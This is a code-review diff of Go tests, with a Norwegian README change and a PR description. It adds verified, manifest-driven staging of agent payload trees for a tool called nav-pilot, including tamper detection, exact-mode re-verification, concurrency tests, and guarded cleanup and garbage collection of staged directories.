+	t.Cleanup(func() { stageCopyHook = nil })
+
+	staged, err := StagePayload(src, manifestPath, root)
+	if err == nil {
+		t.Fatalf("StagePayload = %q, want the copy-time digest check to reject a source that changed after verification", staged)
+	}
+	assertErrMentions(t, err, []string{`"scripts/hook.sh"`, "changed between verification and staging"})
+	if staging == "" {
+		t.Fatal("the hook never observed a partially staged tree; the test is not exercising what it claims")
+	}
+	if _, err := os.Stat(staging); !os.IsNotExist(err) {
+		t.Errorf("the partially staged tree %s still exists (stat err %v); a failed staging must leave nothing behind", staging, err)
+	}
+	assertNoStagedTrees(t, root)
+}
+
+// TestStagePayloadRemovesTheTreeWhenExactVerifyFails gives the final step and
+// its cleanup teeth. The hook widens a file that is already staged, which
+// nothing in the copy loop looks at again, so only the exact re-verification of
+// the finished tree can catch it — the same shape as a chmod that silently did
+// not take.
+func TestStagePayloadRemovesTheTreeWhenExactVerifyFails(t *testing.T) {
+	src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	root := filepath.Join(t.TempDir(), "staged")
+
+	var staging string
+	stageCopyHook = func(rel string) {
+		// On the last file, so the tree is otherwise complete.
+		if rel != "scripts/hook.sh" {
+			return
+		}
+		entries, err := os.ReadDir(root)
+		if err != nil || len(entries) != 1 {
+			t.Errorf("mid-copy: ReadDir(%s) = %v, %v; want exactly the tree being staged", root, entries, err)
+			return
+		}
+		staging = filepath.Join(root, entries[0].Name())
+		chmod(t, filepath.Join(staging, "LICENSE"), 0o600)
+	}
+	t.Cleanup(func() { stageCopyHook = nil })
+
+	staged, err := StagePayload(src, manifestPath, root)
+	if err == nil {
+		t.Fatalf("StagePayload = %q, want the exact re-verification to reject a staged tree whose modes are not the manifest's", staged)
+	}
+	assertErrMentions(t, err, []string{"does not match its manifest after staging", `"LICENSE"`, "exactly"})
+	if staging == "" {
+		t.Fatal("the hook never observed the tree being staged; the test is not exercising what it claims")
+	}
+	if _, err := os.Stat(staging); !os.IsNotExist(err) {
+		t.Errorf("the rejected tree %s still exists (stat err %v); a tree that fails re-verification must not survive", staging, err)
+	}
+	assertNoStagedTrees(t, root)
+}
+
+// TestStagePayloadRejectsPayloadShippingItsOwnManifest covers the one collision
+// the staged layout can have with the source: a manifest kept outside the
+// payload (the client entry's `manifest` override) lets the payload itself ship
+// a manifest.json, which is the name the staged manifest takes.
+func TestStagePayloadRejectsPayloadShippingItsOwnManifest(t *testing.T) {
+	files := append([]payloadFile{{rel: PayloadManifestFile, content: "{}\n", mode: 0o644}}, refPayloadFiles...)
+	dir := writePayloadTree(t, files)
+	// Outside the payload, so verification does not skip the payload's own
+	// manifest.json and the source verifies clean.
+	manifestPath := filepath.Join(t.TempDir(), "payload-manifest.json")
+	writeFile(t, manifestPath, string(payloadManifestBytes(t, payloadManifestDoc(files))))
+	if err := VerifyPayload(dir, manifestPath); err != nil {
+		t.Fatalf("the source must verify for this test to be about staging: %v", err)
+	}
+	root := filepath.Join(t.TempDir(), "staged")
+
+	staged, err := StagePayload(dir, manifestPath, root)
+	if err == nil {
+		t.Fatalf("StagePayload = %q, want a refusal to stage a payload that ships its own %s", staged, PayloadManifestFile)
+	}
+	assertErrMentions(t, err, []string{PayloadManifestFile, "may not ship its own"})
+	assertNoStagedTrees(t, root)
+}
+
+// TestStagePayloadUnwritableStagedRoot pins that a staged root nav-pilot cannot
+// create is an error and not a silent fallback to some other location.
+func TestStagePayloadUnwritableStagedRoot(t *testing.T) {
+	src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	blocker := filepath.Join(t.TempDir(), "not-a-dir")
+	writeFile(t, blocker, "")
+
+	if _, err := StagePayload(src, manifestPath, filepath.Join(blocker, "staged")); err == nil {
+		t.Fatal("StagePayload = nil with an uncreatable staged root, want an error")
+	}
+}
+
+// TestStagePayloadConcurrent pins that two stagings of the same source do not
+// interfere. The per-launch unique directory is the whole reason there are no
+// locks here: a fixed per-pakke directory would have the second launch wipe the
+// config dir a running session is reading from.
+func TestStagePayloadConcurrent(t *testing.T) {
+	src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	root := filepath.Join(t.TempDir(), "staged")
+
+	const n = 8
+	dirs := make([]string, n)
+	errs := make([]error, n)
+	var wg sync.WaitGroup
+	for i := range n {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			dirs[i], errs[i] = StagePayload(src, manifestPath, root)
+		}()
+	}
+	wg.Wait()
+
+	seen := make(map[string]bool, n)
+	for i := range n {
+		if errs[i] != nil {
+			t.Fatalf("concurrent StagePayload #%d = %v, want nil", i, errs[i])
+		}
+		if seen[dirs[i]] {
+			t.Fatalf("concurrent StagePayload returned %s twice; staged trees must not be shared", dirs[i])
+		}
+		seen[dirs[i]] = true
+		if err := VerifyPayloadExact(dirs[i], filepath.Join(dirs[i], PayloadManifestFile)); err != nil {
+			t.Errorf("VerifyPayloadExact(%s) = %v, want nil", dirs[i], err)
+		}
+	}
+	// And removing one leaves the others intact — the case a shared directory
+	// would get wrong.
+	if err := CleanupStaged(dirs[0]); err != nil {
+		t.Fatalf("CleanupStaged = %v, want nil", err)
+	}
+	for i := 1; i < n; i++ {
+		if err := VerifyPayloadExact(dirs[i], filepath.Join(dirs[i], PayloadManifestFile)); err != nil {
+			t.Errorf("after cleaning up a sibling, VerifyPayloadExact(%s) = %v, want nil", dirs[i], err)
+		}
+	}
+}
+
+// --- CleanupStaged ---
+
+func TestCleanupStaged(t *testing.T) {
+	t.Run("removes a staged tree", func(t *testing.T) {
+		src, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+		root := filepath.Join(t.TempDir(), "staged")
+		staged, err := StagePayload(src, manifestPath, root)
+		if err != nil {
+			t.Fatalf("StagePayload = %v", err)
+		}
+		if err := CleanupStaged(staged); err != nil {
+			t.Fatalf("CleanupStaged = %v, want nil", err)
+		}
+		assertNoStagedTrees(t, root)
+	})
+
+	t.Run("a tree that is already gone is not an error", func(t *testing.T) {
+		// The caller defers this unconditionally, so a double cleanup — or a
+		// tree the GC swept first — must not surface as a launch failure.
+		gone := filepath.Join(t.TempDir(), stagedDirPrefix+"vanished")
+		if err := CleanupStaged(gone); err != nil {
+			t.Fatalf("CleanupStaged(missing) = %v, want nil", err)
+		}
+	})
+
+	t.Run("refuses a path that is not a staged tree", func(t *testing.T) {
+		// CleanupStaged is os.RemoveAll with a name check in front of it; the
+		// check is what keeps a caller bug from recursively deleting a home
+		// directory.
+		for _, p := range []string{"", "/", filepath.Join(t.TempDir(), "important")} {
+			if p != "" && p != "/" {
+				mkdirAll(t, p)
+				writeFile(t, filepath.Join(p, "keep.txt"), "hei\n")
+			}
+			err := CleanupStaged(p)
+			if err == nil {
+				t.Fatalf("CleanupStaged(%q) = nil, want a refusal", p)
+			}
+			assertErrMentions(t, err, []string{"refusing to remove", stagedDirPrefix})
+			if p != "" && p != "/" {
+				if _, err := os.Stat(filepath.Join(p, "keep.txt")); err != nil {
+					t.Errorf("CleanupStaged(%q) deleted content it refused to delete: %v", p, err)
+				}
+			}
+		}
+	})
+}
+
+// --- GCStaged ---
+
+func TestGCStaged(t *testing.T) {
+	root := t.TempDir()
+	const maxAge = 24 * time.Hour
+
+	// Four entries: a stale tree (the leak a crash leaves), a fresh tree (a
+	// live session), a stale directory that is not ours, and a stale file.
+	stale := filepath.Join(root, stagedDirPrefix+"stale")
+	fresh := filepath.Join(root, stagedDirPrefix+"fresh")
+	foreign := filepath.Join(root, "someone-elses-work")
+	loose := filepath.Join(root, "notes.txt")
+	for _, d := range []string{stale, fresh, foreign} {
+		mkdirAll(t, d)
+		writeFile(t, filepath.Join(d, "opencode.json"), "{}\n")
+	}
+	writeFile(t, loose, "hei\n")
+	old := time.Now().Add(-maxAge - time.Hour)
+	for _, p := range []string{stale, foreign, loose} {
+		if err := os.Chtimes(p, old, old); err != nil {
+			t.Fatalf("chtimes %s: %v", p, err)
+		}
+	}
+
+	if err := GCStaged(root, maxAge); err != nil {
+		t.Fatalf("GCStaged = %v, want nil", err)
+	}
+	if _, err := os.Stat(stale); !os.IsNotExist(err) {
+		t.Errorf("GCStaged left the stale tree %s behind (stat err %v)", stale, err)
+	}
+	for _, p := range []string{fresh, foreign, loose} {
+		if _, err := os.Stat(p); err != nil {
+			// foreign and loose pin the prefix filter: a sweep by age alone
+			// would delete whatever else the staged root happens to hold.
+			t.Errorf("GCStaged removed %s, which it does not own or which is not stale: %v", p, err)
+		}
+	}
+}
+
+// TestGCStagedMissingRootIsNotAnError pins that the sweep can run before
+// anything has ever been staged, which is every first launch.
+func TestGCStagedMissingRootIsNotAnError(t *testing.T) {
+	if err := GCStaged(filepath.Join(t.TempDir(), "never-staged"), 24*time.Hour); err != nil {
+		t.Fatalf("GCStaged(missing root) = %v, want nil", err)
+	}
+}
+
+// --- VerifyPayloadExact ---
+
+// TestVerifyPayloadExactRejectsWhatVerifyPayloadTolerates asserts the delta
+// between the two verifiers directly: the umask-cleared modes that a source
+// checkout is allowed to have are exactly what a tree nav-pilot chmod'd must
+// not have.
+func TestVerifyPayloadExactRejectsWhatVerifyPayloadTolerates(t *testing.T) {
+	tests := []struct {
+		name string
+		rel  string
+		mode os.FileMode
+	}{
+		{name: "0600 where the manifest declares 0644", rel: "LICENSE", mode: 0o600},
+		{name: "0700 where the manifest declares 0755", rel: "scripts/hook.sh", mode: 0o700},
+		{name: "0640 where the manifest declares 0644", rel: "LICENSE", mode: 0o640},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			dir, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+			chmod(t, filepath.Join(dir, filepath.FromSlash(tt.rel)), tt.mode)
+
+			if err := VerifyPayload(dir, manifestPath); err != nil {
+				t.Fatalf("VerifyPayload = %v, want nil (a umask only clears bits)", err)
+			}
+			err := VerifyPayloadExact(dir, manifestPath)
+			if err == nil {
+				t.Fatal("VerifyPayloadExact = nil, want an exact-mode rejection")
+			}
+			assertErrMentions(t, err, []string{tt.rel, "exactly"})
+		})
+	}
+}
+
+// TestVerifyPayloadExactAcceptsTheDeclaredModes pins that exact mode is a
+// tightening and not a different rule: a conforming tree still passes.
+func TestVerifyPayloadExactAcceptsTheDeclaredModes(t *testing.T) {
+	dir, manifestPath, _ := writeStageSource(t, refPayloadFiles)
+	if err := VerifyPayloadExact(dir, manifestPath); err != nil {
+		t.Fatalf("VerifyPayloadExact = %v, want nil", err)
+	}
+}
+
+// --- helpers ---
+
+// writeStageSource writes a conforming payload tree plus its manifest and
+// returns the tree, the manifest path and the manifest bytes.
+func writeStageSource(t *testing.T, files []payloadFile) (dir, manifestPath string, manifestData []byte) {
+	t.Helper()
+	dir = writePayloadTree(t, files)
+	manifestData = payloadManifestBytes(t, payloadManifestDoc(files))
+	manifestPath = filepath.Join(dir, PayloadManifestFile)
+	writeFile(t, manifestPath, string(manifestData))
+	return dir, manifestPath, manifestData
+}
+
+// assertNoStagedTrees fails when the staged root holds anything nav-pilot
+// staged. A root that was never created counts as empty.
+func assertNoStagedTrees(t *testing.T, root string) {
+	t.Helper()
+	entries, err := os.ReadDir(root)
+	if os.IsNotExist(err) {
+		return
+	}
+	if err != nil {
+		t.Fatalf("reading the staged root %s: %v", root, err)
+	}
+	var left []string
+	for _, e := range entries {
+		if isStagedDir(e.Name()) {
+			left = append(left, e.Name())
+		}
+	}
+	if len(left) > 0 {
+		sort.Strings(left)
+		t.Errorf("staged root %s still holds %s; a failed staging must leave no tree behind", root, strings.Join(left, ", "))
+	}
+}

--- a/docs/README.agentpakke.md
+++ b/docs/README.agentpakke.md
@@ -106,6 +106,7 @@ Utover manifestets form sjekker `nav-pilot validate` (og install) innholdet:
 - Hver Tier 2 `payloads.<kontekst>.path` finnes som katalog.
 - Hver Tier 2-payload har et payload-manifest — `<path>/manifest.json`, eller filen `manifest` peker på. nav-pilot nekter å stage en payload uten manifest.
 - Hvert payload-tre stemmer eksakt med payload-manifestet sitt: `schemaVersion` er 1, hver oppføring i `files` har en gyldig sha256 (64 tegn, små bokstaver) og modus `0644` eller `0755`, hver deklarert fil finnes med riktig innhold, og treet inneholder ingen fil manifestet ikke lister. Symlinker og andre ikke-vanlige filer avvises. Modus sjekkes som kjørbit på kilden, slik at en streng `umask` i checkouten ikke gir falske avvik — eksakt modus settes og verifiseres når payloaden stages.
+- En payload kan ikke selv ha en fil som heter `manifest.json` i rota. Staging skriver payload-manifestet dit i det stagede treet, så navnet er opptatt. Dette kan bare oppstå når `manifest` peker på en fil utenfor payload-katalogen; ligger manifestet på konvensjonsplassen, er det manifestet.
 - `policies.opencodePermissions` finnes som fil hvis den er satt.
 - `profiles.dir` finnes som katalog, og `<dir>/<default>.json` finnes hvis `profiles.default` er satt.
 


### PR DESCRIPTION
WP3a of the M2 plan for #437, the staging half of **G2**. Builds on the verifier from #454.

A Tier 2 payload has to be verified before a client is pointed at it, and the tree the client reads has to be one nav-pilot controls rather than the checkout it came from.

`StagePayload` verifies the source, then copies it into a fresh directory driven by the manifest's file list rather than by walking the source — the manifest is the authority on what exists — re-hashing each file as it is written, creating every file with `O_EXCL` and chmod'ing it to the exact declared mode, then re-verifying the copy with exact mode comparison. That last check is the one the source side deliberately skips: a checkout under a restrictive umask carries 0600 where the manifest says 0644, which is why the source check compares a subset — but the staged tree is ours and must match exactly.

Symlinks, hardlinks and special files cannot appear in a staged tree by construction: every node is either a directory nav-pilot creates or a regular file it opens with `O_CREATE|O_EXCL`. The copy also reads its sources through the same hardened open the verifier uses, so it does not reopen the TOCTOU window verification just closed.

## Design notes

- **A unique directory per launch.** A fixed staging path would let one launch wipe the tree a concurrent session is reading through `OPENCODE_CONFIG_DIR`.
- **Directory modes are not verified.** The manifest declares modes for files only, so there is nothing to compare against. Directories are created 0700, which survives any umask that still lets the user enter their own directories. The reference behaves the same way.
- **`GCStaged`'s age rule means "staged a day ago", not "unused".** A session alive longer than that loses its tree and its client starts failing to read its own config — visible rather than unsafe. Marked in the code with the upgrade path.
- **`CleanupStaged` refuses a path that is not a staged tree.** It is `RemoveAll` behind a name guard, so a caller bug cannot turn into a recursive delete of a home directory.

## Testing

`mise run nav-pilot:check` passes. Round-trip, a real `umask 0077` case (which exact-verify fails without the explicit chmod), seven fail-closed cases, mid-copy corruption caught by the copy-time re-hash, a staged file widened after copying and caught only by the final exact verify, eight concurrent stagings of one source, and the GC/cleanup guards.

Every check was mutation-tested — disabled in a scratch copy, confirmed a named test fails. Thirteen of fourteen have teeth. The fourteenth is disclosed rather than hidden: `O_EXCL|O_NOFOLLOW` on the staged-file create cannot be reached by a test, since the destination lives in a `MkdirTemp` directory created microseconds earlier whose name no other process knows. The flags stay so that the uniqueness invariant is enforced rather than assumed — if it ever breaks, staging fails instead of writing through whatever is in the way.
